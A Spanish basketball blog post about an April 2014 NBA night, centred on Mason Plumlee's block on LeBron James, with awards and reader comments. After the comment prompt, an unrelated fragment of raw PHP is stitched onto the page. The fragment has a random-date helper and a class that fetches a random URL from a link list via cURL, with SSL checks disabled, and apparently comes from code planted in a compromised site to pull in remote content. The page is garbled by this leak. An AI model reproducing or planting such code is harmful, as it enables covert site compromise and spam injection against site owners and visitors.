La Crónica: Plums blocks King James

09 de April de 2014 por TheDeerHunter

El Elegido se disponía a redondear otra de sus supremas actuaciones de la forma que le gusta a él. Culminaría un contragolpe con la posibilidad de machacar el aro para ganar el partido y, de paso, posterizar al iluso de turno que osara a ponerse por delante. El “iluso” era Mason Plumlee, el destacado rookie este curso de la saga familiar, y su respuesta no la esperaba casi nadie. Taponazo y victoria bajo el brazo para certificar lo que alguno defendía que podían hacer los Nets, amargar la existencia a LeBron y los campeones. El berrinche de éste revisando la repetición es muy divertido. Seguro que no suele concentrarse tanto contando los pasos en las repeticiones de sus entradas a canasta.

A parte del morboso regocijo que nos genera ver al más grande hincar la rodilla de vez en cuando la jornada tuvo varios focos de interés más. Los Hawks volvieron a pinchar de forma lamentable, ante unos Pistons que quizá estaban celebrando los rumores que se oyen de la renuncia de Joe Dumars. Stuckey estelar con 29 puntos… una vez al año no hace daño.

En el Oeste un buen número de noticias. Cayeron los Spurs, desperdiciando su primera oportunidad de asegurar el primer puesto de la regular. Ricky Rubio aprovechó la baja de Parker para firmar uno de sus mejores partidos del curso, a buenas horas. Dirk se convertía en el 10º anotador histórico pasando nada menos que a Oscar Robertson y lo hacía con una victoria fundamental ante Utah que les mete medio pie en postemporada. No se puede decir lo mismo de su ex-compañero Steve Nash, que también se convirtió en el tercer mejor asistente de la historia superando a Marc Jackson, aunque él lo hizo recibiendo 145 puntos de los Rockets. El pan de cada día para sus Lakers. 66 puntos de Harden y Terrence Jones, por cierto.

Por último, fin de la racha de Durant, en 41 seguidos… aunque se le vió poco estresado por ello. Victoria fácil de su equipo ante los Kings.

PREMIOS

MVP: James Harden y Terrence Jones disfrutando de lo que es medirse contra los sistemas defensivos D’Antoni. 33 puntos por cabeza más 10 rebotes y 14 asistencias entre ambos. Ni siquiera se puede decir que firmaron más de la mitad de la producción total de su equipo. Paseo en barca, que se llama.

Rookie: Notable campaña de Mason Plumlee, en una hornada tan discreta como la de este año. Podrá contar a sus nietos el pedazo de gorro que le cascó a aquel que se hacía llamar El Elegido.

Sorpresa: Rodney Stuckey es simultáneamente la dejadez y la irregularidad personificadas. Lo mejor que se puede decir de él es que su rendimiento este curso no ha sido tan olvidable como el del pasado. Suficiente como para de vez en cuando destaparse con una actuación que recuerde al jugador importante que algún día nos pareció que iba a ser. 29 puntos para ganar. Que lo apunte en su diario.

Decepción: Los Hawks en su conjunto. Si cuando no puedes fallar lo haces contra un rival tan plano como lo han sido los Pistons las últimas semanas es que no te mereces disputar playoffs. Lo malo es que los Knicks tampoco lo merecen.

Esfuerzo en vano: 29 puntos, 10 rebotes, 6 asistencias y 2 robos. King James hizo (casi) todo para ganar.

Comenta

6 comentarios a esta entrada

  1. turkuglu dice:
    #1

    Un apunte. No ha sido Miles, sino Mason Plumlee el del tapón…

      Citar

  2. Ruxixon dice:
    #2

    Aunque pueda dar la sensación de falta,Plumlee (es Mason por cierto,Miles es el de Phoenix) toca ligeramente la bola así que es tapón legal.Por el camino JoJo le puede hacer falta (falta tonta) eso si,tampoco sé muy bien qué pretendía Johnson con ese contacto en un jugador como LeBron.Sea como fuere da igual,4-0 para Nets en las series particulares y un aviso para los PO.

    Hablábamos el otro dia de las causas del desfallecimiento de los Pacers,comentando sobre Granger y eso.Al parecer a Stephenson no le pareció bien el fichaje de Turner y eso ha roto el vestuario,haciendo cada uno la guerra por su cuenta.Cuestión de psicología en buena medida.Creo que algo parecido le pasa a Heat,no porque haya malos rollos,más bien porque no tengo muy claro que siga el “Big Three” y entre unas cosas y otras por ahí se están distrayendo.Cosa mía que quede claro,pero es extraño ver a dos equipos como Indiana o Miami como si estuvieran subidos a una montaña rusa.

    Stuckey en modo cazo mix,a ver quién es el “listo” que se lo lleva y por cuántos fajos.

      Citar

  3. Ruxixon dice:
    #3

    Por cierto,con el hype de la final de Madness,han sonado Calipari y Ollie para Lakers….ganas tiene Calipari de dejar de ser un dios a nivel universitario -aunque a nivel táctico sea “pse”- para meterse en esa responsabilidad de hacer funcionar a los Lakers con Buss Jr. sobre él,y con Kobe en el equipo,que no es un chiquillo al que puedas domesticar a tu gusto.Lo de Ollie podría ser más probable,aunque lo dudo,además que casi me casa mejor en los Knicks,con Phil Jackson de padrino,rollo Stevens en Boston,aunque no parece que sea la misma filosofía de juego la que tienen directivo y entrenador.

      Citar

  4. Nacho dice:
    #4

    Txus, lo tienes en el mail.

    Cada vez tengo más claro que estos Wolves se parecen más a los Globetrotters. Molan más jugando sin presión.

      Citar

  5. TheDeerHunter dice:
    #5

    Cierto lo de Mason/Miles… perdon por el lapsus y paso a corregirlo.
    Muchas gracias por el apunte.

      Citar

  6. Nacho dice:
    #6

    Interesante artículo sobre los Wolves
    http://blogs.as.com/campoatras/

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>